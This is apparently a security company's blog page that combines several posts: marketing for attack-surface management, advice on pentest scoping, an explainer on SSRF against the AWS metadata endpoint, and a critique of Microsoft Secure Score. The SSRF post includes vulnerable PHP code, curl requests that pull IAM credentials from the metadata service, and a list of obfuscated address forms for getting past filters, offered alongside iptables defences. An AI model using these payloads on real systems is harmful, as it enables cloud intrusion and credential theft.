Warning: This blog contains purposeful marketing and gratuitous plugs for SynerComm’s CASM™ Subscription services. Seriously though, the following article will present the need for better external visibility and vulnerability management.

Whether you are vulnerability scanning to meet compliance requirements or doing it as part of good security practices, there is a universal need. At the time of this article, there are essentially three equally capable and qualified scanning solutions. They include products from Tenable, Rapid7 and Qualys. My point is that each of these scanning solutions, if configured correctly, should produce accurate and similar results. Therefore, as long as your scanning provider is using one of these three solutions, they should be able to detect vulnerabilities. SynerComm starts with a top scanner and then addresses all the gaps that your MSSP is missing. 

Vulnerability scanning and analysis is a critical process within all information security programs. Scanners should find missing patches, dangerous configurations, default passwords, and hundreds of other weaknesses. Their technology is based on probing systems over networks and trying to determine if the system exhibits specific vulnerabilities. While the process itself isn’t complicated, many organizations choose to outsource it to a managed service provider. If you need a provider or already have one, it’s time to upgrade to Continuous Attack Surface Management (CASM™). 

Ditch your Vulnerability Scanning MSSP

Vulnerability scanning MSSPs served their role well for many years but failed to keep up. They failed to keep with cloud migrations, failed to keep up with the rate of IT changes, and failed to provide tools that simplify and enable security for their subscribers. 

VS-MSSPs Lack Discovery of New Assets

VS-MSSPs are Plagued with False Positives and Fail to Accurately Describe Risk 

VS-MSSPs Lack Security Expertise

The benefits of Continuous Attack Surface Management include:

If you’ve ever wondered what your systems and exposures look like to a cyber-criminal, just ask a pentester. SynerComm’s CASM® Engine was originally designed to provide accurate and timely reconnaissance information to our penetration testers. Access to this data and our ‘Findings-Based Reporting’ is available to all CASM® and Continuous Penetration Test subscribers. 

Learn more about our Continuous Attack Surface Management, SynerComm’s CASM® Engine, and our industry-leading Continuous Penetration Test subscriptions. 

VS-MSSPsSynerComm CASM®
Scheduled Scanning of Known Assets✔️✔️
Ad-Hoc (Manual) Scanning✔️✔️
24/7 Online Dashboard Reporting✔️✔️
Discovery of New Assets✔️
Elimination of False-Positives✔️
Validated Findings✔️
Risk-Based Customizable Alerts✔️
Access to Penetration Testers✔️

#_SHELLNTEL

In penetration testing, it’s important to have an accurate scope and even more important to stick to it. This can be simple when the scope is limited to a company’s internet service provider (ISP) or ARIN provided IP ranges. But in many cases, our client’s public systems have grown to include multiple cloud hosted servers, applications, and services. It may seem obvious to say that anything owned or managed by the company should be in-scope for testing, but how do we know what is “owned or managed”? Ideally, we’d test everything that creates risk to an organization, but that isn’t always possible… read on.

I led this article by stating that an accurate scope is critical to penetration testing. If the scope only includes the IP blocks provided by your ISP, you’re probably missing systems that should be tested. Alternately, pentesting a system that you don’t have permission to test could land you in hot water. The good news is that hosting providers like Amazon Web Services (AWS) and Azure allow penetration testing of systems within your account. In other words, because you manage them, you have the right to pentest them. In these environments, pentesting your individual servers (or services) does not affect “neighboring” systems or the cloud host’s infrastructure.

In addition to the many compute and storage providers, you may also have websites and applications that are hosted and managed by a 3rd party. These still create risk to your company, but the hosting provider has complete control over who has permission to perform testing. When there is custom code or sensitive data at play, you should be seeking (written) permission to pentest/assess these systems and applications. If the host is unable or unwilling to allow testing, they should provide evidence of their own independent testing.

There are also going to be cloud systems that, despite creating risk to your organization, can’t be tested at all. This includes software as a service (SaaS) applications like SalesForce, SAP,  and DocuSign. 

And you guessed it… there are also systems like Azure AD, Microsoft 365, and CloudFlare that are not explicitly in-scope, but their controls may not be avoidable during external pentests. MS 365 uses Azure AD which is basically a public extension of your on-premise (internal) Active Directory; complete with extremely high-performance authentication services. Most authentication attacks today take place directly against Azure AD due to its performance and public accessibility. In other words, an attacker could have your passwords before they ever touch a system on your network. Likewise, if your company uses CloudFlare to protect your websites and web applications, it inherently becomes part of the scope because testing of these apps should force you through their proxy/control.

Hopefully this information will help you plan for your next pentest or assessment. If your company maintains an accurate inventory of external systems that includes all of your data center and cloud systems, you’re already off to a great start. Still, there is always value in doing regular searches and discoveries for systems you may be missing. One method involves reviewing your external DNS to obtain a list of A and CNAME records for your domains.  (For ALL of your domains…)  By resolving all of your domains and subdomains you can easily come up with a pretty large list of IP addresses that are in some way tied to your company. Now all you need to do is lookup each IP to see what it’s hosting and who owns it. Easy right?

If you don’t already have a tool for looking up bulk lists of IP addresses or you prefer not to paste a list of your company’s IP addresses into someone else’s website, we’ve got a solution. Whodat.py was written to take very large lists of IP addresses and perform a series of whois and geoip lookups. If the IP address is owned by Amazon or Microsoft, additional details on the service or data center get added based the host’s online documentation. This tool was designed for regular use by our penetration testers, but its concepts and capabilities are a core functionality of our CASM Engine™ and our suite of Continuous Attack Surface Management and Continuous Penetration Testing subscriptions.

Bridging the Gap Between Point-in-Time Penetration Tests 

“So, let’s say we fix all of the vulnerabilities that the pentest discovers… How do we know tomorrow that we’re not vulnerable to something new?”

~Customer

Having been part of the penetration testing industry for over 15 years, I’ve been challenged by many clients with this very question. The fact is that they are right, a penetration test is a point-in-time assessment and new vulnerabilities are discovered every day. We hope that our patch and vulnerability management processes along with our defensive controls (firewalls, etc.) keep our systems secure. Over the past 5 years, we’ve experienced a rise in the number of clients moving towards quarterly penetration testing and seeing the value of rotating through different penetration testers.

In 2017, SynerComm’s penetration testers decided to put their heads together to develop an even better solution. (Honestly, one of our top guys had been nudging me for two years with an idea already…) We agreed that nothing replaces the need for regular human-led penetration testing. As of today, no amount of automation or AI can come close to replicating the intuition and capabilities of an actual penetration tester. That said, if we can be confident that nothing (ok, very little) has changed since the last penetration test, we can be significantly more confident that new vulnerabilities are not present. Building on this idea, the continuous pentest was born.

Continuous pentesting combines the best of both worlds by using automation to continually monitor for changes, and human pentesters to react to those changes quickly. Computers are great at monitoring IP addresses, services, websites, and DNS. They can also monitor breaches and data dumps for names, email addresses, and passwords. What makes continuous pentesting successful, is taking actions based on changes and using orchestration to determine if additional scans can be run and if a pentester should be alerted.

There is no replacement for the validation provided by a thorough, skilled, and human-led penetration test. External and internal pentests with social engineering demonstrate precisely how a determined and skilled intruder could breach your company’s systems and data. Continuous Penetration Testing focuses on public systems and online exposures and should always follow a full, human-led, external penetration test. Partner with SynerComm and we’ll keep an eye on your perimeter security year-round.

One of the greatest, yet seemingly unknown, dangers that face any cloud-based application is the deadly combination of an SSRF vulnerability and the AWS Metadata endpoint. As this write up from Brian Krebbs explains, the breach at Capital One was caused by an SSRF vulnerability that was able to reach the AWS Metadata endpoint and extract the temporary security credentials associated with the EC2 instance's IAM Role. These credentials enabled the attacker to access other Capital One assets in the cloud and the result was that over 100 million credit card applications were compromised.

The purpose of this blog post is to explain the technical details of such a vulnerability and give some helpful suggestions for avoiding a similar situation in any organization.

The Vulnerabilities

In order to fully understand the impact of this cloud one-two punch it is necessary to break down the attack chain into its various components: SSRF and the AWS Metadata Endpoint. First, Server Side Request Forgery (SSRF) is a vulnerability that allows an attacker to control the destination address of an HTTP request sent from the vulnerable server. While this is not always the case (see Blind SSRF), the attacker can often see the response from the request as well. This allows the attacker to use the vulnerable server as a proxy for HTTP requests which can result in the exposure sensitive subnets and services.

Consider the following PHP code:

<?php
echo file_get_contents("http://".$_GET['hostname']."/configureIntegration.php");
?>

The code above sends an HTTP request to the hostname specified by the attacker in the "hostname" GET parameter. Logic like this is commonly found in the "Integrations" section of applications. This code is vulnerable to SSRF. Consider the following scenario: There is a sensitive service running on the loopback interface of the vulnerable server. This is emulated by the following configuration:

The PHP code above is hosted on the web server that faces the internet. When an attacker discovers this endpoint, he/she might use the following to grab the data from the internal application:

curl http://vulnerableserver.com/ssrf.php?hostname=localhost:8081/secret.html?

Which would result in a hit on the internal HTTP server:

┬─[[email protected]:/t/secret]─[02:29:48 PM]
╰─>$ python3 -m http.server 8081 --bind 127.0.0.1
Serving HTTP on 127.0.0.1 port 8081 (http://127.0.0.1:8081/) ...
127.0.0.1 - - [15/Aug/2019 14:30:56] "GET /secret.html?/configureIntegration.php HTTP/1.0" 200 -

and return the following to the attacker:

This is only available on a loopback interface

Now that the danger of SSRF is clear, let's look at how this vulnerability may be exploited in the context of the cloud (AWS in particular).

Due to the dynamic nature of the cloud, it became necessary that server instances (EC2 for example) have some way to get some basic information about their configuration for the purpose of orienting themselves to the environment in which they were spun up. Out of this need the AWS Metadata endpoint was born. This endpoint (169.254.169.254), when hit from any EC2 instance, will reveal information about the configuration of the particular EC2 instance. There is quite a lot of information available via this endpoint including: hostname, external ip address, metrics, lan information, security groups, and last but not least, the IAM (Identity and Access Management) credentials associated with this EC2 instance. It is possible to retrieve these security credentials by hitting the following url where [ROLE] is the IAM role name:

[email protected]:~$ curl 169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE]
{
  "Code" : "Success",
  "LastUpdated" : "2019-08-15T18:13:44Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAN0P3n0W4y1nv4L1d",
  "SecretAccessKey" : "A5tGuw2QXjmqu8cTEu1zs0Dw8yt905HDCzrF0AdE",
  "Token" : "AgoJb3JpZ2luX2VjEJv//////////wEaCXVzLWVhc3QtMSJHMEUCIEX46oh4kz6AtBiTfvoHGqfVuHJI29ryAZy/wXyR51SAiEA04Pyw9HSwSIRNx6vmYpqm7sD+DkLQiFzajuwI2aLEp4q8gMIMxABGgwzNjY4OTY1NTU5NDkiDOBEJDdUKxKUkgkhGyrPA7u8oSds5hcIM0EeoHvgxvCX/ChiDsuCEFO1ctMpOgaQuunsvKLzuaTp/86V96iZzuoPLnpHHsmIUTrCcwwGqFzyaqvJpsFWdv89YIhARAMlcQ1Cc9Cs4pTBSYc/BvbEFb1z0xWqPlBNVKLMzm2K5409f/KCK/eJsxp530Zt7a1MEBp/rvceyiA5gg+6hOu65Um+4BNT+CjlEk3gwL6JUUWr9a2LKYxmyR4fc7XtLD2zB0jwdnG+EPv7aDPj7EoWMUoR/dOQav/oSHi7bl6+kT+koKzwhU/Q286qsk0kXMfG/U95TdUr70I3b/L/dhyaudpLENSU7uvPFi8qGVGpnCuZCvGL2JVSnzf8327jyuiTF7GvXlvUTh8bjxnZ8pAhqyyuxEW1tosL2NuqRHmlCCfnE3wLXJ0yBUr7uxMHTfL1gueEWghymIGhAxiYIKA9PPiHCDrn4gl5AGmLyzqxenZgcNnuwMjeTnhQ0mVf7L8PR4ZWRo9h3C1wMbYnYNi5rdfQcByMIN/XoR2J74sBPor/aObMMHVnmpNjbtRgKh0Vpi48VgXhXfuCAHka3rbYeOBYC8z8nUWYJKuxv3Nj0cQxXDnYT6LPPXmtHgZaBSUwxMHW6gU6tAHi8OEjskLZG81wLq1DiLbdPJilNrv5RPn3bBF+QkkB+URAQ8NBZA/z8mNnDfvESS44fMGFsfTIvIdANcihZQLo6VYvECV8Vw/QaLP/GbljKPwztRC5HSPe6WrC06LZS9yeTpVGZ6jFIn1O/01hJOgEwsK7+DDwcXtE5qtOynmOJiY/iUjcz79LWh184My58ueCNxJuzIM9Tbn0sH3l1eBxECTihDNbL13v5g+8ENaih+f3rNU=",
  "Expiration" : "2019-08-16T00:33:31Z"
}

The response contains several things: the AccessKeyId, SecretAccessKey, and the Token for this account. Using these credentials, an attacker can login to AWS and compromise the server and potentially many other assets. In the case of the Capital One breach, these credentials were used to access an S3 bucket which contained millions of records of user information.

In summary, the poor implementation of the metadata service in AWS allows for an attacker to easily escalate an SSRF vulnerability to control many different cloud assets. Other cloud providers like Google Cloud and Microsoft Azure also provide access to a metadata service endpoint but requests to these endpoints require a special header. This prevents most SSRF vulnerabilities from accessing the sensitive data there.

How to prevent such a vulnerability

In order to prevent this type of vulnerability from occurring firewall rules will need to be put in place to block off the metadata endpoint. This can be done using the following iptables rule:

sudo iptables -A OUTPUT -d 169.254.169.254 -j DROP

This will prevent any access to this ip address. However, if access to the metadata endpoint is required, it is also possible to exclude certain users from this rule. For example, the iptables rule below would allow only the root user to access the metadata endpoint:

sudo iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

These blocks MUST be done at the network level - not the application level. There are too many ways to access this IP address. For example, all of these addresses below refer to the metadata service:

http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
http://169.254.169.254.xip.io/ DNS Name
http://A.8.8.8.8.1time.169.254.169.254.1time.repeat.rebind.network/ DNS Rebinding (8.8.8.8 -> AWS Metadata)

And there are many more. The only reliable way to address this issue is through a network level block of this IP.

The easiest way to check the IAM roles associated with each EC2 instance is to navigate to the EC2 Dashboard in AWS and add the column "IAM Instance Profile Name" by clicking the gear in the top right hand corner. Once the IAM role for each EC2 instance is easily visible, it is possible to check these roles to see if they are overly permissive for the what is required of that EC2 instance.

It is also imperative to understand the pivoting potential of these IAM Roles. If it is possible that an SSRF, XXE, or RCE vulnerability was exploited on any cloud system, the logs for the IAM Role associated with this instance must be thoroughly audited for malicious intent.

Microsoft Secure Score. If you’re an IT administrator or security professional in an organization that uses Office 365, then you’ve no doubt used the tool or at least heard the term. It started as Office 365 Secure Score, but it was renamed in April 2018 to reflect a wider range of elements being scored.

What does it do? The tool looks at configurable settings and actions primarily within your Office 365 and Azure AD environment, and awards points for selections that meet best practices. In their words, “From a centralized dashboard you can monitor and improve the security for your Microsoft 365 identities, data, apps, devices, and infrastructure.”

But what doesn’t Microsoft Secure Score do? Microsoft is very good at telling you the great things its products can do, so I won’t repeat them here. The concept is sound, and I applaud them for giving users a tool that prioritizes secure configurations. They have come a long way from having auditing turned off by default in their products, e.g., Server 2000. I will point out why Microsoft Secure Score isn’t enough when it comes to understanding and testing the security of your Microsoft 365 environment.

Reason number 1:  The fox shouldn’t guard the hen house.

I am a Certified Public Accountant (CPA), and as such, I’ve spent a good portion of my life performing audits and assessments. A key independence rule CPAs abide by is:  an auditor must not audit his or her own work. Microsoft isn’t exactly independent when scoring its own product’s settings and capabilities. The financial motivation exists for Microsoft to setup a scoring system that makes users feel good about using Microsoft products.  Interoperability and performance will always be a higher priority than security.

This fact is furthered by the scoring system setup, which unlocks higher point opportunities with higher priced subscriptions. For example, Microsoft Cloud App Security and Azure Advanced Threat Protection are unlocked with E5 licenses, or as a $5.50 per user per month add on to an existing E3 license. This can be as much as a 70% price increase. If you want more chances to raise your overall score and have a higher score ceiling, spend more money…a very beneficial side-effect for Microsoft.

Also, remember that Secure Score is reflective of a Microsoft opinion and their subjective value for security controls they believe are important. This differs from widely accepted standards from organizations like NIST (National Institute of Standards and Technology) or CIS (Center for Internet Security) which are vendor neutral and have been refined, improved, and evolved over time.

Reason number 2:  No two environments are alike.

First let me say that Secure Score can be dented and bent to fit different environments. Scoring for certain areas can be manually entered if you have a third-party solution for a control. It will be incumbent on the person checking those controls to match what Secure Score is asking for. This is an all-or-nothing proposition as indicated within Secure Score, “Marking as resolved through third-party indicates that you have completed this action in a non-Microsoft app, and will give you the full point value of this action.

This is a key area where the Secure Score blanket fails to keep all areas of the entity covered and warm. There are bound to be components and configuration requirements that don’t quite fit what Secure Score evaluates or how it is scored. Think of the myriad of application combinations to handle Customer Relationship Management (CRM), Mobile Device Management (MDM), Security Information and Event Management (SIEM), Data Loss Prevention (DLP), and Multifactor Authentication (MFA) just to name a few.  An independent assessment of the environment that references best practice hardening guides for specific products comprising the solution is the only way to complete a proper evaluation.

Reason number 3:  Security is a journey, and a scorecard makes it a destination.

Don’t get me wrong, I like scores and grades. CPA’s generally like to measure and quantify things. Secure Score quantifies security, gives you trends over time on your score, and even allows you to measure your score against others based on a global average, industry average, and similar seat count average.

What I don’t like is how the scores can be manipulated, or how they can be construed. If the O365 administrator wants to improve their percentage of points achieved, the simplest way is to select “ignore” for the scoring areas that they have earned 0 points. Per Secure Score documentation, “Once you ignore an improvement action, it will no longer count toward the total Secure score points you have available.” Lower the denominator, keep the numerator, and poof! We are more secure. Or are we?

Executives looking at a scorecard may also be satisfied once it has reached a certain percentage of the total available. A project which will move the Secure Score from 650 out of 807 points to 710 out of 807 points appears to make the company about 8% more secure to a non-security decision maker handling the company budget. That project may not make the cut. In reality, any scoring shortage could represent a critical configuration issue that puts information assets at risk. That point may get lost if the focus is score.

Reason number 4:  A by-product of automated security is a false sense of it.

We hear stories all the time about breach activities that were being reported by automated logging systems, except no one was looking at the logs. IT management puts a tool in place and checks a box that implies the organization is secure in that area. Secure Score is ripe for this. Several improvement actions that will increase your score involve reviewing reports. When a link for a report is clicked, Secure Score assumes the report was reviewed and awards points. To keep the points, the link must be clicked within specific time intervals from within the Secure Score user interface, but this process does not record what was reviewed, or any notes or actions resulting from the review. There is no substitute for the actual review process and confirming that the review is happening.


Also consider an environment made up of multiple applications from different vendors where automated security evaluations, like Secure Score, are put in place. Each application that makes up the system interacts with other applications, potentially creating security control blind spots. For example, an email system that hands-off outbound email to a 3rd party DLP solution. Are there security holes in the process that transfers data in and out of the DLP application? Identifying those weaknesses requires a wholistic view, measured against current accepted best practices, that just isn’t offered by Secure Score or any other automated solution.

In conclusion, I think Secure Score has a place in monitoring and evaluating an organization’s information security posture. Microsoft is taking recommendations from its user base and is working to improve Secure Score’s results and widen its coverage. It is a barometer of an information security environment that could produce important information when properly utilized.  

The bottom line though is that it is just one tool. It cannot replace a diligent information security program; or at a higher level, an information security management system. Independent assessment and review of controls, policies, procedures, and the people managing the environment work in tandem to assure the confidentiality, integrity, and availability of an organizations information assets.  Consider the diversity of an organizations landscape:

These areas are all interdependent, yet all have their own unique traits and ways to be assessed and secured.  No one measurement tool is enough.

By Jeffrey T. Lemmermann, CPA, CISA, CITP, CEH - Information Assurance Consultant

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram